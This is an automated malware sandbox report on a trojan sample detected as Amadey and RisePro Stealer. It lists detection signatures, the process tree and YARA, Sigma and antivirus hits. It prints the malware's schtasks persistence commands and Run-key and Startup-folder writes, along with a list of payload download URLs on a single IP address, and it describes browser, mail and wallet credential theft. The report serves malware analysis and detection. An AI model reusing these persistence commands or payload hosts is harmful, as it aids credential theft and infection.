Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
I2jCDr35mu.exe

Overview

General Information

Sample name:I2jCDr35mu.exe
renamed because original name is a hash value
Original sample name:758c5213c3ffebe919633188f8c07747.exe
Analysis ID:1396093
MD5:758c5213c3ffebe919633188f8c07747
SHA1:fa534e53d645f69d1c950d8ff17e11e877ca970b
SHA256:b50becdb79b109e85caa4f588343fdd7e96152f4e23f40ad213a0336118bc87b
Tags:32exetrojan
Infos:

Detection

Amadey, RisePro Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected RisePro Stealer
Binary is likely a compiled AutoIt script file
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file overlay found
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • I2jCDr35mu.exe (PID: 6268 cmdline: C:\Users\user\Desktop\I2jCDr35mu.exe MD5: 758C5213C3FFEBE919633188F8C07747)
    • schtasks.exe (PID: 4176 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6084 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KFLpYwMPXjapw3SVf9HA.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe" MD5: CBE3CA8AEB654F541B59B3F97C0C9492)
      • chrome.exe (PID: 6204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 7536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2060,i,8917249356731724764,4060394153306559308,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 2748 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 7668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1912 --field-trial-handle=1968,i,14158324147676388731,1062553766962202569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7208 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 8264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1960,i,9119518786017765982,11408166405058387419,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 8292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 8644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1976,i,16814294900655359073,9593979145222890954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • msedge.exe (PID: 8708 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 8776 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2160,i,16389860597425483203,2440417180069271130,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video MD5: BF154738460E4AB1D388970E1AB13FAB)
        • msedge.exe (PID: 8616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2044,i,14961278424366734041,2160420270144941880,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
      • msedge.exe (PID: 9036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com MD5: BF154738460E4AB1D388970E1AB13FAB)
      • chrome.exe (PID: 2128 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 9112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 9528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • firefox.exe (PID: 9756 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9904 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 9956 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • schtasks.exe (PID: 10268 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 10376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 10596 cmdline: schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 10612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • idPXKSo93Tb9SEEu9e8w.exe (PID: 10824 cmdline: "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe" MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • MPGPH131.exe (PID: 1096 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 758C5213C3FFEBE919633188F8C07747)
  • MPGPH131.exe (PID: 5324 cmdline: C:\ProgramData\MPGPH131\MPGPH131.exe MD5: 758C5213C3FFEBE919633188F8C07747)
  • RageMP131.exe (PID: 3632 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 758C5213C3FFEBE919633188F8C07747)
  • RageMP131.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe" MD5: 758C5213C3FFEBE919633188F8C07747)
  • msedge.exe (PID: 9412 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 10112 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2892 --field-trial-handle=2488,i,12328680280612180646,18333747278986842312,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • firefox.exe (PID: 9028 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 7068 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2dec1c63-b17a-4876-842e-08a38d7ca489} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 15443b69710 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 11140 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3352 -childID 1 -isForBrowser -prefsHandle 3476 -prefMapHandle 3456 -prefsLen 21837 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03d6e9a6-1e50-44a7-bf2d-b228302d3bed} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154542c5bd0 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10428 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3648 -prefMapHandle 3644 -prefsLen 22027 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c15219fb-e510-488d-91c4-9069f57fa56f} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 1544ff41d90 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 10360 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3648 -childID 3 -isForBrowser -prefsHandle 2584 -prefMapHandle 4128 -prefsLen 22068 -prefMapSize 238690 -jsInitHandle 1224 -jsInitLen 234236 -parentBuildID 20230927232528 -appDir "C:\Program Files\Mozilla Firefox\browser" - {25243739-fa95-4db8-bf39-e38de4f4d55a} 7068 "\\.\pipe\gecko-crash-server-pipe.7068" 154576c6a10 tab MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • firefox.exe (PID: 2716 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • firefox.exe (PID: 8076 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5876 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • MSIUpdaterV131.exe (PID: 10880 cmdline: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • MSIUpdaterV131.exe (PID: 11052 cmdline: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe MD5: 2C4C8C25D448625A0184403CA56EDB2D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
    C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
      C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zipJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
              00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Click to see the 8 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  51.2.MSIUpdaterV131.exe.ef0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    6.3.MPGPH131.exe.1461520.9.unpackJoeSecurity_RiseProStealerYara detected RisePro StealerJoe Security
                      47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        48.2.MSIUpdaterV131.exe.ef0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\I2jCDr35mu.exe, ProcessId: 6268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131
                          Sigma detected: Startup Folder File Write
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\I2jCDr35mu.exe, ProcessId: 6268, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

                          Snort Signatures

                          No Snort rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://185.215.113.46/mine/amert.exe=;5Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exeheidiMl1n683teX9hAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exetchAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/well.exePBAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/plaza.exegVAAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/plaza.exeeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exe93Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/fu.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/fu.exeagertaTAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exenBuilAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/well.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exeFAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/amert.exegAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exe6Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exeo4HAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/amert.exeSAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exe2Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exe1Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exe0Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/amert.exe?Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exegAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exeppDataAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exebAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/plaza.exeAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/amert.exe4Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/well.exe2Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/amert.exe$Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/plaza.exeMAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/niks.exeFAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/fu.exe22Avira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exexAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/niks.exeJAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/ladas.exerAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/cost/niks.exexAvira URL Cloud: Label: malware
                          Source: http://185.215.113.46/mine/plaza.exe0Avira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Multi AV Scanner detection for domain / URL
                          Source: http://185.215.113.46/Virustotal: Detection: 20%Perma Link
                          Source: http://185.215.113.46/mine/plaza.exeeVirustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exe93Virustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/fu.exeVirustotal: Detection: 23%Perma Link
                          Source: http://185.215.113.46/mine/plaza.exegVAVirustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exenBuilVirustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exeFVirustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exe6Virustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/mine/amert.exegVirustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/well.exeVirustotal: Detection: 21%Perma Link
                          Source: http://185.215.113.46/mine/amert.exeSVirustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exe2Virustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exe1Virustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exe0Virustotal: Detection: 13%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exebVirustotal: Detection: 16%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exegVirustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/mine/amert.exe4Virustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/mine/plaza.exeVirustotal: Detection: 22%Perma Link
                          Source: http://185.215.113.46/mine/plaza.exeMVirustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/niks.exeFVirustotal: Detection: 16%Perma Link
                          Source: http://185.215.113.46/mine/amert.exe$Virustotal: Detection: 12%Perma Link
                          Source: http://185.215.113.46/cost/well.exe2Virustotal: Detection: 14%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exeppDataVirustotal: Detection: 15%Perma Link
                          Source: http://185.215.113.46/cost/ladas.exexVirustotal: Detection: 14%Perma Link
                          Source: http://185.215.113.46/cost/niks.exexVirustotal: Detection: 15%Perma Link
                          Source: http://185.215.113.46/mine/plaza.exe0Virustotal: Detection: 16%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeReversingLabs: Detection: 39%
                          Multi AV Scanner detection for submitted file
                          Source: I2jCDr35mu.exeReversingLabs: Detection: 39%
                          Source: I2jCDr35mu.exeVirustotal: Detection: 41%Perma Link
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exeJoe Sandbox ML: detected
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeJoe Sandbox ML: detected
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: I2jCDr35mu.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004FFC0 CryptUnprotectData,CryptUnprotectData,0_2_0004FFC0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004FEE0 CryptUnprotectData,CryptUnprotectData,0_2_0004FEE0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A0FFC0 CryptUnprotectData,CryptUnprotectData,6_2_00A0FFC0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A0FEE0 CryptUnprotectData,CryptUnprotectData,6_2_00A0FEE0
                          Source: I2jCDr35mu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0003C050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,0_2_0003C050
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010B4E5 recv,FindFirstFileExW,0_2_0010B4E5
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_009FC050 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,__Mtx_unlock,6_2_009FC050
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00ACB4E5 recv,FindFirstFileExW,6_2_00ACB4E5
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeFile opened: C:\Users\user\AppData\Local\Temp
                          Source: firefox.exeMemory has grown: Private usage: 1MB later: 243MB
                          Source: Joe Sandbox ViewIP Address: 13.107.6.158 13.107.6.158
                          Source: Joe Sandbox ViewIP Address: 204.79.197.200 204.79.197.200
                          Source: Joe Sandbox ViewIP Address: 13.107.246.40 13.107.246.40
                          Source: Joe Sandbox ViewIP Address: 185.215.113.46 185.215.113.46
                          Source: Joe Sandbox ViewIP Address: 185.215.113.46 185.215.113.46
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004DBB0 recv,WSAStartup,closesocket,socket,connect,closesocket,0_2_0004DBB0
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.2399452687.0000029036200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000001F.00000003.2384925823.00000159B521C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2385265971.00000159B5232000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2388807749.00000159B5233000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0`0https://www.youtube.com --attempting-deelevationUser equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/video equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.2399452687.0000029036200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.facebook.com/video equals www.facebook.com (Facebook)
